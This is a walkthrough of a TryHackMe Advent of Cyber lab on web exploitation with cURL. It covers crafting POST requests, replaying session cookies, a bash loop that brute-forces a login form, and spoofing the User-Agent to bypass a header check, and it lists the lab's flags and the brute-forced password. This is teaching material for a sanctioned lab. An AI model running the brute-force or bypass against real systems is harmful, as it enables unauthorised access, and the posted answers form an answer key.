Advent of Cyber 2025 Day 24 Walkthrough Exploitation with cURL – Hoperation Eggsploit
Task 1 Introduction
Click here to access the Advent of Cyber 2025 Day 24 Walkthrough – Exploitation with cURL (Hoperation Eggsploit) Room Lab
The Story of Advent of Cyber 2025 Day 24 Walkthrough – Exploitation with cURL (Hoperation Eggsploit)
According to blue-team intel, the wormhole is held open by a control panel on the Evil Bunnies’ web server. The team must shut it down first to cut off reinforcements before facing King Malhare.
However, the terminal they have is bare. No Burp Suite, no browser, just a command prompt.
But that’s fine. The team will use the command line and cURL to speak HTTP directly: send requests, read responses, and find the endpoints that shut the portal.
Learning Objectives
- Understand what HTTP requests and responses are at a high level.
- Use cURL to make basic requests (using GET) and view raw responses in the terminal.
- Send POST requests with cURL to submit data to endpoints.
- Work with cookies and sessions in cURL to maintain login state across requests.
Connecting to the Machine
Before moving forward, review the questions in the connection card shown below:
Start your target VM by clicking the Start Machine button below. The machine will need about 2 minutes to fully boot. Additionally, start your AttackBox by clicking the Start AttackBox button below. The AttackBox will start in split view. In case you can not see it, click the Show Split View button at the top of the page.
Set up your virtual environment
To successfully complete this room, you’ll need to set up your virtual environment. This involves starting both your AttackBox (if you’re not using your VPN) and Target Machines, ensuring you’re equipped with the necessary tools and access to tackle the challenges ahead.
Answer the questions below
I have successfully started the AttackBox and the target machine!
No answer needed
Task 2 Web Hacking Using cURL
HTTP Requests Using cURL
Applications, like our browsers, communicate with servers using HTTP (Hypertext Transfer Protocol). Think of HTTP as the language for asking a server for resources (pages, images, JSON data) and getting answers back.
So if you want to access a website, your browser sends an HTTP request to the web server. If the request is valid, the server replies with an HTTP response that contains the data needed to display the website.
In the absence of a browser, you can still speak HTTP directly from the command line. The simplest way is with cURL.
curl is a command-line tool for crafting HTTP requests and viewing raw responses. It’s ideal when you need precision or when GUI tools aren’t available.
Trying out cURL
Once you have AttackBox ready. Open a command prompt and run the command below:
AttackBox Terminal
root@attackbox:~# curl http://MACHINE_IP/What happens after running the command is that curl sends an HTTP GET request for the site’s home page. An HTTP response is received containing the body, which is then printed in the terminal. Because this is a terminal, instead of rendering the webpage, what you’ll see is the text representation of the page in HTML.
Sending POST Requests
Suppose you’ve found a login form whose POST target is /post.php. When you log in through a browser, it sends a POST request to the server containing the credentials you entered. We can simulate this directly from the terminal.
A normal login form submission might look like this:
AttackBox Terminal
root@attackbox:~# curl -X POST -d "username=user&password=user" http://MACHINE_IP/post.phpYou should get the reply Invalid credentials.
Here’s what’s happening:
-X POSTtells cURL to use the POST method.-ddefines the data we’re sending in the body of the request.- The data will be sent in URL-encoded format, which is the same as what HTML forms use.
If the application expects additional fields, like a “Login” button or a CSRF token, they can be included too:
AttackBox Terminal
root@attackbox:~# curl -X POST -d "username=user&password=user&submit=Login" http://MACHINE_IP/post.phpTo view exactly what the server returns (including headers and potential redirects), add the -i flag:
AttackBox Terminal
root@attackbox:~# curl -i -X POST -d "username=user&password=user" http://MACHINE_IP/post.phpIf the site responds with a Set-Cookie header, that’s a good sign, it means you’ve successfully logged in or at least triggered a session.
Using Cookies and Sessions
Once you log in, web applications use cookies to keep your session active. When you make another request with your browser, the cookie gets sent automatically, but with cURL, you need to handle it yourself.
You can do this in two steps:
Step 1: Save the cookies
Terminal
root@attackbox:~# curl -c cookies.txt -d "username=admin&password=admin" http://MACHINE_IP/session.php- The
-coption writes any cookies received from the server into a file (cookies.txtin this case). - You’ll often see a session cookie like
PHPSESSID=xyz123.
Step 2: Reuse the saved cookies
Terminal
root@attackbox:~# curl -b cookies.txt http://MACHINE_IP/session.php- The
-boption tells cURL to send the saved cookies in the next request, just like a browser would.
This is exactly how session replay testing works, by replaying valid cookies in separate requests.
Automating Login and Performing Brute Force Using cURL
Now that we can send POST requests and manage sessions, it’s time to automate things. Let’s simulate a brute-force attack against a weak login form.
Start by creating a file called passwords.txt and place the following passwords inside it:
admin123
password
letmein
secretpass
secretThen, create a simple bash loop called loop.sh to try each password against bruteforce.php and copy-paste the following code inside it:
for pass in $(cat passwords.txt); do
echo "Trying password: $pass"
response=$(curl -s -X POST -d "username=admin&password=$pass" http://MACHINE_IP/bruteforce.php)
if echo "$response" | grep -q "Welcome"; then
echo "[+] Password found: $pass"
break
fi
doneThen add the execute permission to the script and run it, as shown below:
AttackBox Terminal
root@attackbox:~# chmod +x loop.sh
root@attackbox:~# ./loop.shHere’s how this works:
$(cat passwords.txt)reads each password from the file.curl -ssends the login request silently (no progress meter).- The response is stored in a variable.
grep -qchecks if the response contains a success string (like “Welcome”).- When found, it prints the working password and exits the loop.
This exact method underpins tools like Hydra, Burp Intruder, and WFuzz. By doing it manually, you understand what’s happening under the hood: a repetitive HTTP POST with variable data, waiting for a different response.
Bypassing User-Agent Checks
Some applications block cURL by checking the User-Agent header. For example, the server may reject requests with: User-Agent: curl/7.x.x
To specify a custom user-agent, we can use the -A flag:
Terminal
root@attackbox:~# curl -A "internalcomputer" http://MACHINE_IP/ua_check.phpTo confirm the check:
Terminal
root@attackbox:~# curl -i http://MACHINE_IP/ua_check.php
root@attackbox:~# curl -i -A "internalcomputer" http://MACHINE_IP/ua_check.phpIf the first fails and the second succeeds, the UA check is working, and you’ve bypassed it by spoofing.
Bonus Mission
This section is optional and applies only to the final bonus question. The instructions in this section do not apply to the regular questions. Feel free to skip it and proceed with the regular questions if you don’t intend to attempt it.
Before the final battle can begin, the wormhole must be closed to stop enemy reinforcements. The evil Easter bunnies operate a web control panel that holds it open. The blue team must identify endpoints, authenticate and obtain the operator token, and call the close operation.
Hint: Use rockyou.txt when brute forcing for the password (only for the bonus mission). The PIN is between 4000 and 5000.
Server: http://MACHINE_IP/terminal.php?action=panel
Answer the questions below
Make a POST request to the /post.php endpoint with the username admin and the password admin. What is the flag you receive?
THM{curl_post_success}
Make a request to the /cookie.php endpoint with the username admin and the password admin and save the cookie. Reuse that saved cookie at the same endpoint. What is the flag your receive?
THM{session_cookie_master}
After doing the brute force on the /bruteforce.php endpoint, what is the password of the admin user?
secretpass
Make a request to the /agent.php endpoint with the user-agent TBFC. What is the flag your receive?
THM{user_agent_filter_bypassed}
Bonus question: Can you solve the Final Mission and get the flag?
No answer needed
Task 3 Conclusion
The Final Battle Commences
With the wormhole closed, King Malhare no longer had access to his reinforcements. McSkidy looked to her fellow Wareville town members. The king would only be vulnerable for a moment. The time to strike was now!
“Charge!!!” McSkidy exclaimed.
McSkidy and the townspeople of Wareville began unloading a barrage of snowballs on the king’s bunny battalion. They quickly returned fire with egg projectiles. The skyline became a blur of snowballs and eggs, and McSkidy used this moment of chaos to sneak into the king’s throne room.
Just as McSkidy was about to gain entry, a voice stopped her.
“Not so fast,” giggled Sir Carrotbane.
He slowly approached McSkidy, who suddenly felt underprepared. Just when she thought she was out of luck, Sir Breachblocker III stepped in front of her.
“Go,” he simply said.
“Wh… what are you doing?” Sir Carrotbane stuttered.
“What I should have done a long time ago. What’s right!” Sir Breachblocker III slammed his shield into the snow and drew his sword.
“GO!” he shouted, turning to McSkidy.
The End of the Road
McSkidy seized the moment and ran into the king’s throne room, where she found King Malhare throwing a tantrum.
“WHERE ARE MY REINFORCEMENTS?!”
“They’re not coming, Malhare,” McSkidy affirmed. “It’s over. Wareville is ours. Now let’s see how you like being captive. Now!”
As she shouted, two Wareville town members sprang a cage on the king.
It was over. Thanks in large part to your efforts, McSkidy had been freed, and King Malhare had finally been stopped. Wareville was safe once again. The king was dethroned and sent to HopSec Prison along with his coconspirator, Sir Carrotbane. Sir Breachblocker III was pardoned for his part in stopping the king’s tyrannical plan and later became King Breachblocker.
Congratulations on finishing Advent of Cyber and saving the day! From all of us at TryHackMe, have a Merry Soc-Mas and a “Hoppy” New Year!
Answer the questions below
I just completed Advent of Cyber 2025!
No answer needed
Completion Message – Advent of Cyber 2025 Day 24 Walkthrough
Congratulations on successfully completing the Advent of Cyber 2025 Day 24 Walkthrough!
By finishing the Advent of Cyber 2025 Day 24 Walkthrough, you have demonstrated a solid understanding of web exploitation fundamentals using cURL and direct HTTP interaction. You explored how web applications process requests behind the scenes, manually crafted GET and POST requests, handled session cookies, and bypassed weak security controls that rely on headers or client-side checks.
Completing the Advent of Cyber 2025 Day 24 Walkthrough proves that you can think like an attacker, analyze application behavior at the protocol level, and work effectively even when advanced tools are not available. This challenge strengthens your practical cybersecurity skills and prepares you for real-world scenarios where understanding the basics makes all the difference.
Well done on reaching this milestone in your Tryhackme Advent of Cyber 2025 journey keep practicing, keep learning, and keep pushing your limits.
Related Resources
- Advent of Cyber 2025 Prep Track
- Advent of Cyber 2025 Day 1 Walkthrough Linux CLI Shells Bells
- Advent of Cyber 2025 Day 2 Phishing Merry Clickmas
- Advent of Cyber 2025 Day 3 Walkthrough Splunk Basics – Did you SIEM?
- Advent of Cyber 2025 Day 4 Walkthrough AI in Security old sAInt nick
- Advent of Cyber 2025 Day 5 Walkthrough IDOR Santa’s Little IDOR
- Advent of Cyber 2025 Day 6 Walkthrough Malware Analysis Egg xecutable
- Advent of Cyber 2025 Day 7 Walkthrough Network Discovery Scanta Clause
- Advent of Cyber 2025 Day 8 Walkthrough Prompt Injection Schedyule conflict
- Advent of Cyber 2025 Day 9 Walkthrough Passwords A Cracking Christmas
- Advent of Cyber 2025 Day 10 Walkthrough SOC Alert Triaging – Tinsel Triage
- Advent of Cyber 2025 Day 11 Walkthrough XSS Merry XSSMas
- Advent of Cyber 2025 Day 12 Walkthrough Phishing Phishmas Greetings
- Advent of Cyber 2025 Day 13 Walkthrough YARA Rules YARA mean one
- Advent of Cyber 2025 Day 14 Walkthrough Containers DoorDasher’s Demise
- Advent of Cyber 2025 Day 15 Walkthrough Web Attack Forensics – Drone Alone
- Advent of Cyber 2025 Day 16 Walkthrough Forensics – Registry Furensics
- Advent of Cyber 2025 Day 17 Walkthrough CyberChef – Hoperation Save McSkidy
- Advent of Cyber 2025 Day 18 Walkthrough Obfuscation – The Egg Shell File
- Advent of Cyber 2025 Day 19 Walkthrough ICS/Modbus – Claus for Concern
- Advent of Cyber 2025 Day 20 Walkthrough Race Conditions – Toy to The World
- Advent of Cyber 2025 Day 21 Walkthrough Race Malware Analysis – Malhare.exe
- Advent of Cyber 2025 Day 22 Walkthrough C2 Detection – Command & Carol
- Advent of Cyber 2025 Day 23 Walkthrough AWS Security – S3cret Santa
- TryHackMe CTF Writeups & Walkthrough Roadmap
Frequently Asked Questions (FAQs)
1. What is the main objective of Advent of Cyber 2025 Day 24 Walkthrough?
The main objective of the Advent of Cyber 2025 Day 24 Walkthrough is to teach web exploitation using cURL by interacting directly with HTTP endpoints, managing sessions, and exploiting weak server-side security controls.
2. Why is cURL used in Advent of Cyber 2025 Day 24 Walkthrough?
cURL is used to help learners understand how web requests work at a low level, without relying on browsers or graphical tools, which is essential for mastering real-world web security concepts.
3. What skills do I gain from Advent of Cyber 2025 Day 24 Walkthrough?
You gain hands-on experience with HTTP requests, authentication testing, session handling, brute-force logic, and identifying insecure web configurations.
4. Is Advent of Cyber 2025 Day 24 Walkthrough relevant for real-world cybersecurity roles?
Yes, the Advent of Cyber 2025 Day 24 Walkthrough is highly relevant for SOC analysts, penetration testers, and blue team members, as it mirrors real attack techniques used against web applications and APIs.
5. What should I do after completing Advent of Cyber 2025 Day 24 Walkthrough?
After completing the Advent of Cyber 2025 Day 24 Walkthrough, you should continue practicing web security labs, study the OWASP Top 10, and explore advanced topics such as API security, authentication mechanisms, and automated testing tools.